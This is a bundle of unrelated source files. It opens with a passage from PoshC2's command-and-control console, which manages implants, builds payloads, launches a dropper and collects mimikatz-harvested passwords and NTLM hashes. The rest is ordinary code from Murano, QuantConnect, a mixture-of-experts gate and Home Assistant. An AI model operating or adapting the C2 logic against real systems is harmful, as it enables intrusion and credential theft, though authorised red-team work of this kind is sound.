if "Proxy" in pivot_original:
Pivot = Pivot + ";P"
from datetime import datetime, timedelta
LastSeenTime = datetime.strptime(LastSeen, "%d/%m/%Y %H:%M:%S")
now = datetime.now()
if(Sleep.endswith('s')):
sleep_int = int(Sleep[:-1])
elif(Sleep.endswith('m')):
sleep_int = int(Sleep[:-1]) * 60
elif(Sleep.endswith('h')):
sleep_int = int(Sleep[:-1]) * 60 * 60
else:
print(Colours.RED)
print("Incorrect sleep format: %s" % Sleep)
print(Colours.END)
continue
nowMinus3Beacons = now - timedelta(seconds=(sleep_int * 3))
nowMinus10Beacons = now - timedelta(seconds=(sleep_int * 10))
sID = "[" + str(ID) + "]"
if not Label:
sLabel = ""
else:
sLabel = "[" + Label + "]"
if nowMinus10Beacons > LastSeenTime:
print(Colours.RED + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
elif nowMinus3Beacons > LastSeenTime:
print(Colours.YELLOW + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
else:
print(Colours.GREEN + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
else:
from datetime import datetime, timedelta
now = datetime.now()
print(Colours.RED + "No Implants as of: %s" % now.strftime("%d/%m/%Y %H:%M:%S"))
print(Colours.END + "")
if printhelp:
print(printhelp)
t = tabCompleter()
t.createListCompleter(PRECOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
history = get_history_dict()
if history:
for command in history:
try:
readline.add_history(command[1])
except Exception:
pass
command = input("Select ImplantID or ALL or Comma Separated List (Enter to refresh):: ")
print("")
if command:
try:
last = get_lastcommand()
if last:
if last != command:
new_commandhistory(command)
else:
new_commandhistory(command)
except Exception:
pass
command = command.strip()
if (command == "") or (command == "back") or (command == "clear"):
startup(user)
if command.startswith("output-to-html"):
generate_table("Tasks")
generate_table("C2Server")
generate_table("Creds")
generate_table("Implants")
graphviz()
time.sleep(1)
startup(user)
if command.startswith("show-urls") or command.startswith("list-urls"):
urls = get_c2urls()
urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n"
for i in urls:
urlformatted += "%s %s %s %s %s %s %s %s \n" % (i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7])
startup(user, urlformatted)
if command.startswith("add-autorun"):
if command == "add-autorun":
startup(user, "Please specify a module to autorun")
autorun = command.replace("add-autorun ", "")
autorun = autorun.replace("add-autorun", "")
add_autorun(autorun)
startup(user, "add-autorun: %s\r\n" % autorun)
if command.startswith("list-autorun"):
autoruns = get_autorun()
startup(user, autoruns)
if command.startswith("del-autorun"):
autorun = command.replace("del-autorun ", "")
del_autorun(autorun)
startup(user, "deleted autorun\r\n")
if command.startswith("nuke-autorun"):
del_autoruns()
startup(user, "nuked autoruns\r\n")
if (command == "automigrate-frompowershell") or (command == "am"):
startup(user, "automigrate not currently implemented for the Python version of PoshC2\r\n")
if command.startswith("show-serverinfo"):
i = get_c2server_all()
detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDownloadURI: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\nSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s\n" % (i[1], i[2], i[3], i[4], i[5], i[6], i[7], i[8], i[9], i[10], i[11], i[12], i[13], i[14], i[15], i[16], i[17], i[18], i[19], i[20], i[21], i[22], i[23], i[24])
startup(user, detailsformatted)
if command.startswith("turnoff-notifications"):
update_item("EnableNotifications", "C2Server", "No")
startup(user, "Turned off notifications on new implant")
if command.startswith("turnon-notifications"):
update_item("EnableNotifications", "C2Server", "Yes")
startup(user, "Turned on notifications on new implant")
if command.startswith("set-clockworksmsapikey"):
cmd = command.replace("set-clockworksmsapikey ", "")
cmd = cmd.replace("set-clockworksmsapikey", "")
update_item("MobileNumber", "C2Server", cmd)
startup(user, "Updated set-clockworksmsapikey: %s\r\n" % cmd)
if command.startswith("set-clockworksmsnumber"):
cmd = command.replace("set-clockworksmsnumber ", "")
cmd = cmd.replace("set-clockworksmsnumber", "")
update_item("APIKEY", "C2Server", cmd)
startup(user, "Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd)
if command.startswith("set-defaultbeacon"):
new_sleep = command.replace("set-defaultbeacon ", "")
new_sleep = new_sleep.replace("set-defaultbeacon", "")
if not validate_sleep_time(new_sleep):
print(Colours.RED)
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
startup(user)
else:
update_item("DefaultSleep", "C2Server", new_sleep)
startup(user, "Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % new_sleep)
if command.startswith("opsec"):
implants = get_implants_all()
comtasks = get_tasks()
hosts = ""
uploads = ""
urls = ""
users = ""
creds = ""
hashes = ""
for i in implants:
if i[3] not in hosts:
hosts += "%s \n" % i[3]
if i[9] not in urls:
urls += "%s \n" % i[9]
for t in comtasks:
hostname = get_implantdetails(t[1])
command = t[2].lower()
output = t[3].lower()
if hostname[2] not in users:
users += "%s\\%s @ %s\n" % (hostname[11], hostname[2], hostname[3])
if "invoke-mimikatz" in t[2] and "logonpasswords" in t[3]:
allcreds = process_mimikatz(t[3])
for cred in allcreds:
if cred is not None:
if cred[1]:
creds += cred[0] + " Password: " + cred[1] + "\n"
if cred[2]:
hashes += cred[0] + " : NTLM:" + cred[2] + "\n"
if "uploading file" in command:
uploadedfile = command
uploadedfile = uploadedfile.partition("uploading file: ")[2].strip()
filehash = uploadedfile.partition(" with md5sum:")[2].strip()
uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip()
uploadedfile = uploadedfile.strip('"')
uploads += "%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile)
if "installing persistence" in output:
implant_details = get_implantdetails(t[2])
line = command.replace('\n', '')
line = line.replace('\r', '')
filenameuploaded = line.rstrip().split(":", 1)[1]
uploads += "%s %s \n" % (implant_details[3], filenameuploaded)
if "written scf file" in output:
implant_details = get_implantdetails(t[2])
uploads += "%s %s\n" % (implant_details[3], output[output.indexof(':'):])
startup(user, "Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urls, uploads, creds, hashes))
if command.startswith("listmodules"):
mods = ""
for modname in os.listdir("%s/Modules/" % POSHDIR):
mods += "%s\r\n" % modname
startup(user, mods)
if command.startswith("creds"):
startup(user, "creds module not implemented yet")
if (command == "pwnself") or (command == "p"):
subprocess.Popen(["python", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
startup(user)
if (command == "tasks") or (command == "tasks "):
alltasks = ""
tasks = get_newtasks_all()
if tasks is None:
startup(user, "No tasks queued!\r\n")
else:
for task in tasks:
imname = get_implantdetails(task[1])
alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11], imname[2]), task[2])
startup(user, "Queued tasks:\r\n\r\n%s" % alltasks)
if (command == "cleartasks") or (command == "cleartasks "):
drop_newtasks()
startup(user, "Empty tasks queue\r\n")
if command.startswith("quit"):
ri = input("Are you sure you want to quit? (Y/n) ")
if ri.lower() == "n":
startup(user)
if ri == "":
sys.exit(0)
if ri.lower() == "y":
sys.exit(0)
if command.startswith("createdaisypayload"):
createdaisypayload(user, startup)
if command.startswith("createproxypayload"):
createproxypayload(user, startup)
if command.startswith("createnewpayload"):
createnewpayload(user, startup)
if (command == "?") or (command == "help"):
startup(user, pre_help)
if (command == "history") or command == "history ":
startup(user, get_history())
if command.startswith("use "):
command = command.replace("use ", "")
params = re.compile("use ", re.IGNORECASE)
command = params.sub("", command)
commandloop(command, user)
except Exception as e:
if 'unable to open database file' in str(e):
startup(user)
else:
traceback.print_exc()
print("Error: %s" % e)
print("Currently no valid implants: sleeping for 10 seconds")
time.sleep(10)
startup(user)
def runcommand(command, randomuri):
if command:
try:
last = get_lastcommand()
if last:
if last != command:
new_commandhistory(command)
else:
new_commandhistory(command)
except Exception:
pass
implant_type = get_implanttype(randomuri)
if implant_type.startswith("Python"):
handle_py_command(command, user, randomuri, startup)
elif implant_type.startswith("C#"):
handle_sharp_command(command, user, randomuri, startup)
else:
handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload)
return
def commandloop(implant_id, user):
while(True):
try:
implant_id_orig = implant_id
t = tabCompleter()
t.createListCompleter(COMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
if ("-" in implant_id) or ("all" in implant_id) or ("," in implant_id):
print(Colours.GREEN)
command = input("%s> " % (implant_id))
else:
hostname = get_hostdetails(implant_id)
if hostname[15] == 'Python':
t.createListCompleter(UXCOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
if hostname[15] == 'C#':
t.createListCompleter(SHARPCOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
print(Colours.GREEN)
print("%s\\%s @ %s (PID:%s)" % (hostname[11], hostname[2], hostname[3], hostname[8]))
command = input("%s> " % (implant_id))
# if "all" run through all implants get_implants()
if implant_id == "all":
if command == "back":
startup(user)
implant_split = get_implants()
if implant_split:
for implant_id in implant_split:
runcommand(command, implant_id[1])
# if "seperated list" against single uri
elif "," in implant_id:
implant_split = implant_id.split(",")
for implant_id in implant_split:
implant_id = get_randomuri(implant_id)
runcommand(command, implant_id)
# if "range" against single uri
elif "-" in implant_id:
implant_split = implant_id.split("-")
for implant_id in range(int(implant_split[0]), int(implant_split[1]) + 1):
try:
implant_id = get_randomuri(implant_id)
runcommand(command, implant_id)
except Exception:
print("Unknown ImplantID")
# else run against single uri
else:
implant_id = get_randomuri(implant_id)
runcommand(command, implant_id)
# then run back around
commandloop(implant_id_orig, user) # is this required for a while loop? looks like it would lead to a stackoverflow anyway?
except Exception:
print(Colours.RED)
print("Error running against the selected implant ID, ensure you have typed the correct information")
print(Colours.END)
# traceback.print_exc()
# print ("Error: %s" % e)
time.sleep(1)
startup(user, user)
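# Illustrative sketch (not part of PoshC2): commandloop() above accepts "all",
# a comma-separated list such as "1,3,7", or a range such as "2-5" as the
# implant selector. The hypothetical helper below shows that selection logic
# in isolation; it assumes implant IDs are plain integers.
def expand_implant_selection(selection, known_ids):
    """Return the list of implant IDs targeted by a selector string."""
    selection = selection.strip().lower()
    if selection == "all":
        return list(known_ids)
    if "," in selection:
        return [int(part) for part in selection.split(",") if part.strip()]
    if "-" in selection:
        start, end = (int(part) for part in selection.split("-", 1))
        return list(range(start, end + 1))
    return [int(selection)]
# Example: expand_implant_selection("2-4", [1, 2, 3, 4, 5]) == [2, 3, 4]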
if __name__ == '__main__':
original_sigint = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, catch_exit)
parser = argparse.ArgumentParser(description='The command line for handling implants in PoshC2')
parser.add_argument('-u', '--user', help='the user for this session')
args = parser.parse_args()
user = args.user
if user is None:
user = input("Enter your username: ")
startup(user)
|
the-stack_106_14895
|
# Copyright (c) 2014 Mirantis, Inc.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import cgi
import os
import tempfile
import jsonschema
from oslo_config import cfg
from oslo_db import exception as db_exc
from webob import exc
import murano.api.v1
from murano.api.v1 import schemas
from murano.common import policy
from murano.common import wsgi
from murano.db.catalog import api as db_api
from murano.common.i18n import _, _LW
from murano.openstack.common import exception
from murano.openstack.common import log as logging
from murano.packages import exceptions as pkg_exc
from murano.packages import load_utils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
SUPPORTED_PARAMS = murano.api.v1.SUPPORTED_PARAMS
LIST_PARAMS = murano.api.v1.LIST_PARAMS
ORDER_VALUES = murano.api.v1.ORDER_VALUES
PKG_PARAMS_MAP = murano.api.v1.PKG_PARAMS_MAP
def _check_content_type(req, content_type):
try:
req.get_content_type((content_type,))
except exception.InvalidContentType:
msg = _("Content-Type must be '{0}'").format(content_type)
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
def _get_filters(query_params):
filters = {}
for param_pair in query_params:
k, v = param_pair
if k not in SUPPORTED_PARAMS:
LOG.warning(_LW("Search by parameter '{name}' "
"is not supported. Skipping it.").format(name=k))
continue
if k in LIST_PARAMS:
filters.setdefault(k, []).append(v)
else:
filters[k] = v
order_by = filters.get('order_by', [])
for i in order_by[:]:
if ORDER_VALUES and i not in ORDER_VALUES:
filters['order_by'].remove(i)
LOG.warning(_LW(
"Value of 'order_by' parameter is not valid. "
"Allowed values are: {0}. Skipping it.").format(
", ".join(ORDER_VALUES)))
return filters
def _validate_body(body):
"""Check multipart/form-data has two parts: text (which is json string and
should be parsed into a dictionary in the serializer) and file, which is stored
as a cgi.FieldStorage instance. Also validate the file size doesn't exceed
the limit: seek to the end of the file, get the position of EOF and
reset the file position to the beginning
"""
def check_file_size(f):
mb_limit = CONF.packages_opts.package_size_limit
pkg_size_limit = mb_limit * 1024 * 1024
f.seek(0, 2)
size = f.tell()
f.seek(0)
if size > pkg_size_limit:
raise exc.HTTPBadRequest(explanation=_(
'Uploaded file is too large.'
' The limit is {0} Mb').format(mb_limit))
if len(body.keys()) > 2:
msg = _("'multipart/form-data' request body should contain "
"1 or 2 parts: json string and zip archive. Current body "
"consists of {0} part(s)").format(len(body.keys()))
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
file_obj = None
package_meta = None
for part in body.values():
if isinstance(part, cgi.FieldStorage):
file_obj = part
check_file_size(file_obj.file)
if isinstance(part, dict):
package_meta = part
if file_obj is None:
msg = _('There is no file package with application description')
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
return file_obj, package_meta
class Controller(object):
"""WSGI controller for application catalog resource in Murano v1 API."""
def update(self, req, body, package_id):
"""List of allowed changes:
{ "op": "add", "path": "/tags", "value": [ "foo", "bar" ] }
{ "op": "add", "path": "/categories", "value": [ "foo", "bar" ] }
{ "op": "remove", "path": "/tags" }
{ "op": "remove", "path": "/categories" }
{ "op": "replace", "path": "/tags", "value": ["foo", "bar"] }
{ "op": "replace", "path": "/is_public", "value": true }
{ "op": "replace", "path": "/description",
"value":"New description" }
{ "op": "replace", "path": "/name", "value": "New name" }
"""
policy.check("modify_package", req.context, {'package_id': package_id})
pkg_to_update = db_api.package_get(package_id, req.context)
if pkg_to_update.is_public:
policy.check("manage_public_package", req.context)
_check_content_type(req, 'application/murano-packages-json-patch')
if not isinstance(body, list):
msg = _('Request body must be a JSON array of operation objects.')
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
for change in body:
if 'is_public' in change['path']:
if change['value'] is True and not pkg_to_update.is_public:
policy.check('publicize_package', req.context)
break
package = db_api.package_update(package_id, body, req.context)
return package.to_dict()
def get(self, req, package_id):
policy.check("get_package", req.context, {'package_id': package_id})
package = db_api.package_get(package_id, req.context)
return package.to_dict()
def search(self, req):
def _validate_limit(value):
if value is None:
return
try:
value = int(value)
except ValueError:
msg = _("limit param must be an integer")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
if value <= 0:
msg = _("limit param must be positive")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
return value
policy.check("get_package", req.context)
filters = _get_filters(req.GET.items())
limit = _validate_limit(filters.get('limit'))
if limit is None:
limit = CONF.packages_opts.limit_param_default
limit = min(CONF.packages_opts.api_limit_max, limit)
result = {}
catalog = req.GET.pop('catalog', '').lower() == 'true'
packages = db_api.package_search(
filters, req.context, limit, catalog=catalog)
if len(packages) == limit:
result['next_marker'] = packages[-1].id
result['packages'] = [package.to_dict() for package in packages]
return result
def upload(self, req, body=None):
"""Upload new file archive for the new package
together with package metadata.
"""
policy.check("upload_package", req.context)
_check_content_type(req, 'multipart/form-data')
file_obj, package_meta = _validate_body(body)
if package_meta:
try:
jsonschema.validate(package_meta, schemas.PKG_UPLOAD_SCHEMA)
except jsonschema.ValidationError as e:
msg = _("Package schema is not valid: {0}").format(e)
LOG.exception(msg)
raise exc.HTTPBadRequest(explanation=msg)
else:
package_meta = {}
if package_meta.get('is_public'):
policy.check('publicize_package', req.context)
with tempfile.NamedTemporaryFile(delete=False) as tempf:
LOG.debug("Storing package archive in a temporary file")
content = file_obj.file.read()
if not content:
msg = _("Uploading file can't be empty")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
tempf.write(content)
package_meta['archive'] = content
try:
pkg_to_upload = load_utils.load_from_file(
tempf.name, target_dir=None, drop_dir=True)
except pkg_exc.PackageLoadError as e:
msg = _("Couldn't load package from file: {0}").format(e)
LOG.exception(msg)
raise exc.HTTPBadRequest(explanation=msg)
finally:
LOG.debug("Deleting package archive temporary file")
os.remove(tempf.name)
# extend dictionary for update db
for k, v in PKG_PARAMS_MAP.items():
if hasattr(pkg_to_upload, k):
package_meta[v] = getattr(pkg_to_upload, k)
try:
package = db_api.package_upload(package_meta, req.context.tenant)
except db_exc.DBDuplicateEntry:
msg = _('Package with specified full name is already registered')
LOG.exception(msg)
raise exc.HTTPConflict(msg)
return package.to_dict()
def get_ui(self, req, package_id):
target = {'package_id': package_id}
policy.check("get_package", req.context, target)
package = db_api.package_get(package_id, req.context)
return package.ui_definition
def get_logo(self, req, package_id):
target = {'package_id': package_id}
policy.check("get_package", req.context, target)
package = db_api.package_get(package_id, req.context)
return package.logo
def get_supplier_logo(self, req, package_id):
package = db_api.package_get(package_id, req.context)
return package.supplier_logo
def download(self, req, package_id):
target = {'package_id': package_id}
policy.check("download_package", req.context, target)
package = db_api.package_get(package_id, req.context)
return package.archive
def delete(self, req, package_id):
target = {'package_id': package_id}
policy.check("delete_package", req.context, target)
package = db_api.package_get(package_id, req.context)
if package.is_public:
policy.check("manage_public_package", req.context, target)
db_api.package_delete(package_id, req.context)
def get_category(self, req, category_id):
policy.check("get_category", req.context)
category = db_api.category_get(category_id, packages=True)
return category.to_dict()
def show_categories(self, req):
policy.check("get_category", req.context)
categories = db_api.categories_list()
return {'categories': [category.name for category in categories]}
def list_categories(self, req):
policy.check("get_category", req.context)
categories = db_api.categories_list()
return {'categories': [category.to_dict() for category in categories]}
def add_category(self, req, body=None):
policy.check("add_category", req.context)
if not body.get('name'):
raise exc.HTTPBadRequest(
explanation='Please, specify a name of the category to create')
try:
category = db_api.category_add(body['name'])
except db_exc.DBDuplicateEntry:
msg = _('Category with specified name already exists')
LOG.error(msg)
raise exc.HTTPConflict(explanation=msg)
return category.to_dict()
def delete_category(self, req, category_id):
target = {'category_id': category_id}
policy.check("delete_category", req.context, target)
category = db_api.category_get(category_id, packages=True)
if category.packages:
msg = _("It's impossible to delete categories assigned"
" to the package, uploaded to the catalog")
raise exc.HTTPForbidden(explanation=msg)
db_api.category_delete(category_id)
class PackageSerializer(wsgi.ResponseSerializer):
def serialize(self, action_result, accept, action):
if action == 'get_ui':
accept = 'text/plain'
elif action in ('download', 'get_logo', 'get_supplier_logo'):
accept = 'application/octet-stream'
return super(PackageSerializer, self).serialize(action_result,
accept,
action)
def create_resource():
serializer = PackageSerializer()
return wsgi.Resource(Controller(), serializer=serializer)
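# Illustrative sketch (not part of Murano): an example request body for
# Controller.update() above, built from the operations listed in its
# docstring. The request must be sent with the
# 'application/murano-packages-json-patch' content type; the package id used
# in the comment is a hypothetical placeholder.
EXAMPLE_UPDATE_BODY = [
    {"op": "replace", "path": "/name", "value": "New name"},
    {"op": "add", "path": "/tags", "value": ["foo", "bar"]},
    {"op": "replace", "path": "/is_public", "value": True},
]
# e.g. Controller().update(req, EXAMPLE_UPDATE_BODY, package_id="1234-abcd")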
|
the-stack_106_14896
|
import sys
import unittest
from inspect import signature
# from trex_stl_lib.api import *
from wireless.trex_wireless_rpc_message import *
from wireless.trex_wireless_traffic_handler_rpc import *
from wireless.trex_wireless_traffic_handler import *
class TrafficHandlerCallTest(unittest.TestCase):
"""Tests methods for the TrafficHandlerCall subclasses.
These tests check that the corresponding functions exist on the TrafficHandler.
"""
def test_function_well_defined(self):
"""Test that all TrafficHandlerCalls defined in 'trex_wireless_traffic_handler_rpc' are well defined traffic_handler calls in 'trex_wireless_traffic_handler'."""
traffic_handlercalls_classes = TrafficHandlerCall.__subclasses__() # TrafficHandlerCall subclasses
traffic_handlercalls_names = [wc.NAME for wc in traffic_handlercalls_classes] # Names of the TrafficHandlerCall subclasses
methods_name_list = [func for func in dir(TrafficHandler) if callable(getattr(TrafficHandler, func))] # all method names of TrafficHandler
methods_list = [getattr(TrafficHandler, func) for func in methods_name_list] # all methods of TrafficHandler
remote_calls_list = [method for method in methods_list if hasattr(method, "remote_call") and method.remote_call] # all methods tagged as remote_call of TrafficHandler
remote_calls_names_list = [method.__name__ for method in remote_calls_list] # all method names tagged as remote_call of TrafficHandler
# check that all TrafficHandlerCalls are defined as a TrafficHandler method
for wc in traffic_handlercalls_names:
self.assertTrue(wc in remote_calls_names_list, "TrafficHandlerCall {} should be implemented as a remote call in TrafficHandler".format(wc))
# check that all remote calls in TrafficHandler are defined as a TrafficHandlerCall
for rc in remote_calls_names_list:
self.assertTrue(rc in traffic_handlercalls_names, "remote call {} should be implemented as a TrafficHandlerCall".format(rc))
# check that all TrafficHandlerCalls match in the number of arguments
for wc in traffic_handlercalls_classes:
init_sig_params = signature(wc.__init__).parameters
wc_num_args = len(init_sig_params)
method = getattr(TrafficHandler, wc.NAME)
wc_method_num_args = len(signature(method).parameters)
self.assertEqual(wc_num_args, wc_method_num_args, "TrafficHandlerCall and TrafficHandler method '{}''s signature do not match".format(wc.NAME))
|
the-stack_106_14897
|
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.
# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from AlgorithmImports import *
### <summary>
### Test algorithm using 'QCAlgorithm.AddUniverseSelection(IUniverseSelectionModel)'
### </summary>
class AddUniverseSelectionModelAlgorithm(QCAlgorithm):
def Initialize(self):
''' Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must be initialized.'''
self.SetStartDate(2013,10,8) #Set Start Date
self.SetEndDate(2013,10,11) #Set End Date
self.SetCash(100000) #Set Strategy Cash
self.UniverseSettings.Resolution = Resolution.Daily
# set algorithm framework models
self.SetAlpha(ConstantAlphaModel(InsightType.Price, InsightDirection.Up, timedelta(minutes = 20), 0.025, None))
self.SetPortfolioConstruction(EqualWeightingPortfolioConstructionModel())
self.SetExecution(ImmediateExecutionModel())
self.SetUniverseSelection(ManualUniverseSelectionModel([ Symbol.Create("SPY", SecurityType.Equity, Market.USA) ]))
self.AddUniverseSelection(ManualUniverseSelectionModel([ Symbol.Create("AAPL", SecurityType.Equity, Market.USA) ]))
self.AddUniverseSelection(ManualUniverseSelectionModel(
Symbol.Create("SPY", SecurityType.Equity, Market.USA), # duplicate will be ignored
Symbol.Create("FB", SecurityType.Equity, Market.USA)))
def OnEndOfAlgorithm(self):
if self.UniverseManager.Count != 3:
raise ValueError("Unexpected universe count")
if self.UniverseManager.ActiveSecurities.Count != 3:
raise ValueError("Unexpected active securities")
|
the-stack_106_14899
|
r"""
Balanced gate with Switch Transformer's policy (Google, 2021)
"""
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from .naive_gate import NaiveGate
from .utils import limit_by_capacity
class SwitchGate(NaiveGate):
r"""
A switch gate implementation
"""
def __init__(self, d_model, num_expert, world_size, topk=1,
switch_eps=.1, capacity=(1.2, 2.4),gate_all_comm=True, inner_gpu_cnt=4,save=False,layer_idx=-1,loss_k=1):
assert topk == 1, 'topk should be 1 in switch'
super().__init__(d_model, num_expert, world_size, top_k=1)
self.switch_eps = switch_eps
self.capacity = capacity
# self.k = loss_k
self.k = 0.2
print("loss k is:", self.k)
def forward(self, inp):
r"""
The switch firstly conduct softmax and then calculates the top-1
"""
score = self.gate(inp)
if self.training:
# random uniform number from [1-eps, 1+eps]
noise = torch.rand_like(score)
noise = noise * 2 * self.switch_eps + 1.0 - self.switch_eps
score += noise
# fp32 softmax for numerical stability
score = F.softmax(score.float(), dim=-1)
top1_score, top1_idx = torch.topk(
score, k=1, dim=-1, largest=True
) # [.. x top_k]
top1_score = top1_score.to(dtype=inp.dtype)
# cap_rate = self.capacity[0 if self.training else 1]
# capacity = math.ceil(cap_rate * inp.shape[0])
# _new_lec, _new_gec, top1_idx = limit_by_capacity(
# top1_idx, self.num_expert, self.world_size, capacity)
# valid_idx = top1_idx[top1_idx > -1]
valid_idx = top1_idx[top1_idx > -1] # fix bug
fraction_expert = torch.scatter_add(
torch.zeros(self.tot_expert, device=valid_idx.device),
0,
valid_idx,
torch.ones_like(valid_idx, dtype=torch.float),
) / valid_idx.numel()
prob_expert = score.sum(dim=0) / valid_idx.numel()
loss = (fraction_expert * prob_expert).sum() * self.tot_expert
cap_rate = self.capacity[0 if self.training else 1]
capacity = math.ceil(cap_rate * inp.shape[0])
_new_lec, _new_gec, top1_idx = limit_by_capacity(
top1_idx, self.num_expert, self.world_size, capacity)
# if torch.distributed.get_rank()==0:
# print(loss,valid_idx.numel())
# quit()
# print(loss,valid_idx.numel())
self.set_loss(loss*self.k)
return top1_idx, top1_score
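# Illustrative sketch (not part of fastmoe): the load-balancing term computed
# in SwitchGate.forward() above, reproduced on random data so the fraction /
# probability product is easy to inspect. The token and expert counts are
# arbitrary example values; the module-level torch / F imports are reused.
if __name__ == "__main__":
    torch.manual_seed(0)
    num_tokens, num_expert = 8, 4
    score = F.softmax(torch.randn(num_tokens, num_expert), dim=-1)
    top1_idx = score.argmax(dim=-1)
    fraction_expert = torch.zeros(num_expert).scatter_add_(
        0, top1_idx, torch.ones_like(top1_idx, dtype=torch.float)
    ) / num_tokens
    prob_expert = score.sum(dim=0) / num_tokens
    balance_loss = (fraction_expert * prob_expert).sum() * num_expert
    print("example balance loss:", balance_loss.item())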
|
the-stack_106_14901
|
"""An abstract class for entities."""
from abc import ABC
import asyncio
from datetime import datetime, timedelta
import functools as ft
import logging
from timeit import default_timer as timer
from typing import Any, Awaitable, Dict, Iterable, List, Optional
from homeassistant.config import DATA_CUSTOMIZE
from homeassistant.const import (
ATTR_ASSUMED_STATE,
ATTR_DEVICE_CLASS,
ATTR_ENTITY_PICTURE,
ATTR_FRIENDLY_NAME,
ATTR_ICON,
ATTR_SUPPORTED_FEATURES,
ATTR_UNIT_OF_MEASUREMENT,
DEVICE_DEFAULT_NAME,
STATE_OFF,
STATE_ON,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import CALLBACK_TYPE, Context, HomeAssistant, callback
from homeassistant.exceptions import HomeAssistantError, NoEntitySpecifiedError
from homeassistant.helpers.entity_platform import EntityPlatform
from homeassistant.helpers.entity_registry import RegistryEntry
from homeassistant.helpers.event import Event, async_track_entity_registry_updated_event
from homeassistant.helpers.typing import StateType
from homeassistant.loader import bind_hass
from homeassistant.util import dt as dt_util, ensure_unique_string, slugify
_LOGGER = logging.getLogger(__name__)
SLOW_UPDATE_WARNING = 10
DATA_ENTITY_SOURCE = "entity_info"
SOURCE_CONFIG_ENTRY = "config_entry"
SOURCE_PLATFORM_CONFIG = "platform_config"
@callback
@bind_hass
def entity_sources(hass: HomeAssistant) -> Dict[str, Dict[str, str]]:
"""Get the entity sources."""
return hass.data.get(DATA_ENTITY_SOURCE, {})
def generate_entity_id(
entity_id_format: str,
name: Optional[str],
current_ids: Optional[List[str]] = None,
hass: Optional[HomeAssistant] = None,
) -> str:
"""Generate a unique entity ID based on given entity IDs or used IDs."""
return async_generate_entity_id(entity_id_format, name, current_ids, hass)
@callback
def async_generate_entity_id(
entity_id_format: str,
name: Optional[str],
current_ids: Optional[Iterable[str]] = None,
hass: Optional[HomeAssistant] = None,
) -> str:
"""Generate a unique entity ID based on given entity IDs or used IDs."""
name = (name or DEVICE_DEFAULT_NAME).lower()
preferred_string = entity_id_format.format(slugify(name))
if current_ids is not None:
return ensure_unique_string(preferred_string, current_ids)
if hass is None:
raise ValueError("Missing required parameter current_ids or hass")
test_string = preferred_string
tries = 1
while not hass.states.async_available(test_string):
tries += 1
test_string = f"{preferred_string}_{tries}"
return test_string
class Entity(ABC):
"""An abstract class for Home Assistant entities."""
# SAFE TO OVERWRITE
# The properties and methods here are safe to overwrite when inheriting
# this class. These may be used to customize the behavior of the entity.
entity_id = None # type: str
